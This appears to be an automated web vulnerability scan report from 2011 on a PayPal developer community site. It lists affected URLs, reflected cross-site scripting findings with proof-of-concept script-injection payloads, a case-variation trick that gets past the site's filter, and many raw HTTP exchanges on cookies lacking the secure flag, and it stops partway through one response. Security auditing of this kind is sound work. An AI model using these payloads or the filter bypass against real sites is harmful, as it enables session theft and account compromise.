7.74. https://www.x.com/community/ppx/xspaces/forums

7.75. https://www.x.com/community/ppx/xspaces/gaming

7.76. https://www.x.com/community/ppx/xspaces/identity

7.77. https://www.x.com/community/ppx/xspaces/innovate

7.78. https://www.x.com/community/ppx/xspaces/introduce

7.79. https://www.x.com/community/ppx/xspaces/mobile

7.80. https://www.x.com/community/ppx/xspaces/mobile/mecl

7.81. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

7.82. https://www.x.com/community/ppx/xspaces/security

7.83. https://www.x.com/community/ppx/xspaces/social

7.84. https://www.x.com/community/ppx/xspaces/subscriptions

7.85. https://www.x.com/community/ppx/xspaces/toolkits

7.86. https://www.x.com/community/ppx/xspaces/web_checkout

7.87. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

7.88. https://www.x.com/community/ppx/xspaces/web_checkout/soap

7.89. https://www.x.com/community/xcommerce-blogs

7.90. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

7.91. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

7.92. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

7.93. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

7.94. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

7.95. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

7.96. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

7.97. https://www.x.com/community/xcommerce-blogs/blog/tags/adobe

7.98. https://www.x.com/community/xcommerce-blogs/blog/tags/andriod

7.99. https://www.x.com/community/xcommerce-blogs/blog/tags/apps

7.100. https://www.x.com/community/xcommerce-blogs/blog/tags/challenge

7.101. https://www.x.com/community/xcommerce-blogs/blog/tags/developer

7.102. https://www.x.com/community/xcommerce-blogs/blog/tags/developer_network

7.103. https://www.x.com/community/xcommerce-blogs/blog/tags/ebay

7.104. https://www.x.com/community/xcommerce-blogs/blog/tags/paypal

7.105. https://www.x.com/community/xcommerce-blogs/blog/tags/winners

7.106. https://www.x.com/community/xcommerce-blogs/blog/tags/x.commerce

7.107. https://www.x.com/community/xcommerce-blogs/blog/tags/xcommerce

7.108. https://www.x.com/doc-publish.jspa

7.109. https://www.x.com/docs/DOC-1031

7.110. https://www.x.com/docs/DOC-1041

7.111. https://www.x.com/docs/DOC-1051

7.112. https://www.x.com/docs/DOC-1106

7.113. https://www.x.com/docs/DOC-1106/delete

7.114. https://www.x.com/docs/DOC-1106/restore

7.115. https://www.x.com/docs/DOC-1108

7.116. https://www.x.com/docs/DOC-1116

7.117. https://www.x.com/docs/DOC-1176

7.118. https://www.x.com/docs/DOC-1204

7.119. https://www.x.com/docs/DOC-1216

7.120. https://www.x.com/docs/DOC-1332

7.121. https://www.x.com/docs/DOC-1372

7.122. https://www.x.com/docs/DOC-1374

7.123. https://www.x.com/docs/DOC-1401

7.124. https://www.x.com/docs/DOC-1431

7.125. https://www.x.com/docs/DOC-1551

7.126. https://www.x.com/docs/DOC-1613

7.127. https://www.x.com/docs/DOC-2241

7.128. https://www.x.com/docs/DOC-2346

7.129. https://www.x.com/docs/DOC-3201

7.130. https://www.x.com/docs/DOC-3212

7.131. https://www.x.com/docs/DOC-3251

7.132. https://www.x.com/docs/DOC-3271

7.133. https://www.x.com/docs/DOC-3321

7.134. https://www.x.com/docs/DOC-3322

7.135. https://www.x.com/docs/DOC-3323

7.136. https://www.x.com/docs/DOC-3345

7.137. https://www.x.com/docs/DOC-3351

7.138. https://www.x.com/docs/DOC-3352

7.139. https://www.x.com/docs/DOC-3353

7.140. https://www.x.com/docs/DOC-3354

7.141. https://www.x.com/docs/DOC-3355

7.142. https://www.x.com/docs/DOC-3371

7.143. https://www.x.com/docs/DOC-3372

7.144. https://www.x.com/docs/DOC-3373

7.145. https://www.x.com/docs/DOC-3374

7.146. https://www.x.com/docs/DOC-3375

7.147. https://www.x.com/docs/DOC-3426

7.148. https://www.x.com/docs/DOC-3427

7.149. https://www.x.com/docs/DOC-3431

7.150. https://www.x.com/docs/DOC-3443

7.151. https://www.x.com/docs/DOC-3444

7.152. https://www.x.com/docs/DOC-3491

7.153. https://www.x.com/docs/DOC-3561

7.154. https://www.x.com/docs/DOC-3562

7.155. https://www.x.com/docs/DOC-3619

7.156. https://www.x.com/docs/DOC-3688

7.157. https://www.x.com/docs/DOC-3811

7.158. https://www.x.com/docs/DOC-3811/delete

7.159. https://www.x.com/docs/DOC-3811/restore

7.160. https://www.x.com/docs/DOC-3812

7.161. https://www.x.com/docs/DOC-3836

7.162. https://www.x.com/docs/DOC-3841

7.163. https://www.x.com/docs/emailPasswordToken!input.jspa

7.164. https://www.x.com/emailPasswordToken!input.jspa

7.165. https://www.x.com/groups/

7.166. https://www.x.com/ideas/

7.167. https://www.x.com/index.jspa

7.168. https://www.x.com/main-apps.jspa

7.169. https://www.x.com/message/186684

7.170. https://www.x.com/message/198017

7.171. https://www.x.com/message/211333

7.172. https://www.x.com/message/211439

7.173. https://www.x.com/message/211738

7.174. https://www.x.com/message/212001

7.175. https://www.x.com/message/212124

7.176. https://www.x.com/message/212170

7.177. https://www.x.com/message/212753

7.178. https://www.x.com/message/212906

7.179. https://www.x.com/message/213354

7.180. https://www.x.com/message/213546

7.181. https://www.x.com/message/213568

7.182. https://www.x.com/message/213571

7.183. https://www.x.com/message/213767

7.184. https://www.x.com/message/213787

7.185. https://www.x.com/message/213788

7.186. https://www.x.com/message/213865

7.187. https://www.x.com/message/214347

7.188. https://www.x.com/message/214440

7.189. https://www.x.com/message/214618

7.190. https://www.x.com/message/214902

7.191. https://www.x.com/message/214926

7.192. https://www.x.com/message/215245

7.193. https://www.x.com/message/215254

7.194. https://www.x.com/message/215264

7.195. https://www.x.com/message/215276

7.196. https://www.x.com/message/215291

7.197. https://www.x.com/people

7.198. https://www.x.com/people/

7.199. https://www.x.com/people/BaldGeek

7.200. https://www.x.com/people/BaldGeek/blog

7.201. https://www.x.com/people/CorinneSherman

7.202. https://www.x.com/people/GiancarloUk2

7.203. https://www.x.com/people/IndieReign

7.204. https://www.x.com/people/JasonVenner

7.205. https://www.x.com/people/MrcheckAPX

7.206. https://www.x.com/people/PP_Igor

7.207. https://www.x.com/people/PP_MTS_Andre

7.208. https://www.x.com/people/PP_MTS_Chad

7.209. https://www.x.com/people/PP_MTS_GuidoT

7.210. https://www.x.com/people/PP_MTS_Magarvin

7.211. https://www.x.com/people/PP_MTS_Patrick

7.212. https://www.x.com/people/PayPalXadmin

7.213. https://www.x.com/people/PayPal_Carolyn

7.214. https://www.x.com/people/PayPal_Sudha

7.215. https://www.x.com/people/PayPal_ToddS

7.216. https://www.x.com/people/Praveen

7.217. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

7.218. https://www.x.com/people/RightWayMail

7.219. https://www.x.com/people/S.Aijaz

7.220. https://www.x.com/people/SRS

7.221. https://www.x.com/people/Saleem

7.222. https://www.x.com/people/Shade8934

7.223. https://www.x.com/people/Suneetha

7.224. https://www.x.com/people/admin

7.225. https://www.x.com/people/amypiazza00

7.226. https://www.x.com/people/angelleye

7.227. https://www.x.com/people/billday

7.228. https://www.x.com/people/blingnation2010

7.229. https://www.x.com/people/bryngregory

7.230. https://www.x.com/people/das_licht

7.231. https://www.x.com/people/dchankhour

7.232. https://www.x.com/people/eferreira

7.233. https://www.x.com/people/emailPasswordToken!input.jspa

7.234. https://www.x.com/people/encore

7.235. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

7.236. https://www.x.com/people/gazugafan

7.237. https://www.x.com/people/gem

7.238. https://www.x.com/people/gogoeric

7.239. https://www.x.com/people/hotellina

7.240. https://www.x.com/people/iConcessionStand

7.241. https://www.x.com/people/joncas

7.242. https://www.x.com/people/lwhite2104

7.243. https://www.x.com/people/mandeheritage

7.244. https://www.x.com/people/odeskdev

7.245. https://www.x.com/people/omuleanu

7.246. https://www.x.com/people/pluto26

7.247. https://www.x.com/people/posiden5665

7.248. https://www.x.com/people/ramonmorales123

7.249. https://www.x.com/people/rizkygarut

7.250. https://www.x.com/people/roguereptile

7.251. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

7.252. https://www.x.com/people/sebastian.kopp@wooga.com

7.253. https://www.x.com/people/skier

7.254. https://www.x.com/projects/

7.255. https://www.x.com/search.jspa

7.256. https://www.x.com/tags

7.257. https://www.x.com/tags/

7.258. https://www.x.com/threads

8. Email addresses disclosed

8.1. https://www.x.com/community/feeds/blogs

8.2. https://www.x.com/community/feeds/documents

8.3. https://www.x.com/community/feeds/messages

8.4. https://www.x.com/community/feeds/popularthreads

8.5. https://www.x.com/community/feeds/unansweredthreads

8.6. https://www.x.com/community/ppx/businesspayments

8.7. https://www.x.com/community/ppx/devchallenge

8.8. https://www.x.com/community/ppx/devchallenge/

8.9. https://www.x.com/community/ppx/devtalk

8.10. https://www.x.com/community/ppx/devzone

8.11. https://www.x.com/community/ppx/global/uk

8.12. https://www.x.com/docs/DOC-1106

8.13. https://www.x.com/docs/DOC-1106.pdf

8.14. https://www.x.com/docs/DOC-1431

8.15. https://www.x.com/docs/DOC-1551

8.16. https://www.x.com/docs/DOC-1613

8.17. https://www.x.com/docs/DOC-2241

8.18. https://www.x.com/message/198017

8.19. https://www.x.com/message/212753

8.20. https://www.x.com/message/213865

8.21. https://www.x.com/message/214902

8.22. https://www.x.com/message/215254

8.23. https://www.x.com/message/215291

8.24. https://www.x.com/people/BaldGeek

8.25. https://www.x.com/people/BaldGeek.vcf

8.26. https://www.x.com/people/CorinneSherman

8.27. https://www.x.com/people/PayPal_Sudha

8.28. https://www.x.com/people/angelleye

8.29. https://www.x.com/people/encore

8.30. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

8.31. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

8.32. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

8.33. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

8.34. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

8.35. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

8.36. https://www.x.com/themes/paypal/js/custom.js

9. Social security numbers disclosed

10. Credit card numbers disclosed

10.1. https://www.x.com/community/feeds/documents

10.2. https://www.x.com/docs/DOC-2241

11. Cacheable HTTPS response

11.1. https://www.x.com/dwr/interface/Clearvote.js

11.2. https://www.x.com/ideas/

11.3. https://www.x.com/opensearch.xml

11.4. https://www.x.com/people

11.5. https://www.x.com/people/

11.6. https://www.x.com/people/BaldGeek

11.7. https://www.x.com/people/BaldGeek.vcf

11.8. https://www.x.com/people/BaldGeek/blog

11.9. https://www.x.com/people/CorinneSherman

11.10. https://www.x.com/people/GiancarloUk2

11.11. https://www.x.com/people/IndieReign

11.12. https://www.x.com/people/JasonVenner

11.13. https://www.x.com/people/MrcheckAPX

11.14. https://www.x.com/people/PP_Igor

11.15. https://www.x.com/people/PP_MTS_Andre

11.16. https://www.x.com/people/PP_MTS_Chad

11.17. https://www.x.com/people/PP_MTS_GuidoT

11.18. https://www.x.com/people/PP_MTS_Magarvin

11.19. https://www.x.com/people/PP_MTS_Patrick

11.20. https://www.x.com/people/PayPalXadmin

11.21. https://www.x.com/people/PayPal_Carolyn

11.22. https://www.x.com/people/PayPal_Sudha

11.23. https://www.x.com/people/PayPal_ToddS

11.24. https://www.x.com/people/Praveen

11.25. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

11.26. https://www.x.com/people/RightWayMail

11.27. https://www.x.com/people/S.Aijaz

11.28. https://www.x.com/people/SRS

11.29. https://www.x.com/people/Saleem

11.30. https://www.x.com/people/Shade8934

11.31. https://www.x.com/people/Suneetha

11.32. https://www.x.com/people/admin

11.33. https://www.x.com/people/amypiazza00

11.34. https://www.x.com/people/angelleye

11.35. https://www.x.com/people/billday

11.36. https://www.x.com/people/blingnation2010

11.37. https://www.x.com/people/bryngregory

11.38. https://www.x.com/people/das_licht

11.39. https://www.x.com/people/dchankhour

11.40. https://www.x.com/people/eferreira

11.41. https://www.x.com/people/encore

11.42. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

11.43. https://www.x.com/people/gazugafan

11.44. https://www.x.com/people/gem

11.45. https://www.x.com/people/gogoeric

11.46. https://www.x.com/people/hotellina

11.47. https://www.x.com/people/iConcessionStand

11.48. https://www.x.com/people/joncas

11.49. https://www.x.com/people/lwhite2104

11.50. https://www.x.com/people/mandeheritage

11.51. https://www.x.com/people/odeskdev

11.52. https://www.x.com/people/omuleanu

11.53. https://www.x.com/people/pluto26

11.54. https://www.x.com/people/posiden5665

11.55. https://www.x.com/people/ramonmorales123

11.56. https://www.x.com/people/rizkygarut

11.57. https://www.x.com/people/roguereptile

11.58. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

11.59. https://www.x.com/people/sebastian.kopp@wooga.com

11.60. https://www.x.com/people/skier

11.61. https://www.x.com/resources/scripts/fancyzoom/images/

11.62. https://www.x.com/resources/scripts/tiny_mce3

11.63. https://www.x.com/servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf

11.64. https://www.x.com/servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf

11.65. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

11.66. https://www.x.com/tags

11.67. https://www.x.com/themes/paypal/images/favicon.ico

11.68. https://www.x.com/threads

12. HTML does not specify charset

12.1. https://www.x.com/dwr/interface

12.2. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

13. Content type incorrectly stated

13.1. https://www.x.com/dwr/interface/Clearvote.js

13.2. https://www.x.com/opensearch.xml

13.3. https://www.x.com/view-video-short.jspa

14. SSL certificate



1. Cross-site scripting (reflected)
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.x.com/blogs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /blogs/?cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6=1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=254072 t=1313157109864597
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/main-blogposts.jspa?cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6=1&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

1.2. https://www.x.com/community/ppx/xspaces/introduce [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /community/ppx/xspaces/introduce?c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed=1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323032343b31342c323032333b31342c323036343b31342c323033343b31342c323032353b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=269298 t=1313157066395842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/community/ppx/xspaces/introduce?c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed=1&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

2. SSL cookie without secure flag set
There are 222 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.x.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 12 Aug 2011 01:59:23 GMT
Server: Apache-Coyote/1.1
Location: https://www.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; Path=/
Set-Cookie: jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=1446 t=1313114363172657
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: NSC_xxx.y.dpn-443=44ed4e27151d;path=/


2.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.4. https://www.x.com/community/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.5. https://www.x.com/community/ppx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.6. https://www.x.com/community/ppx/adaptive_accounts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.7. https://www.x.com/community/ppx/adaptive_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
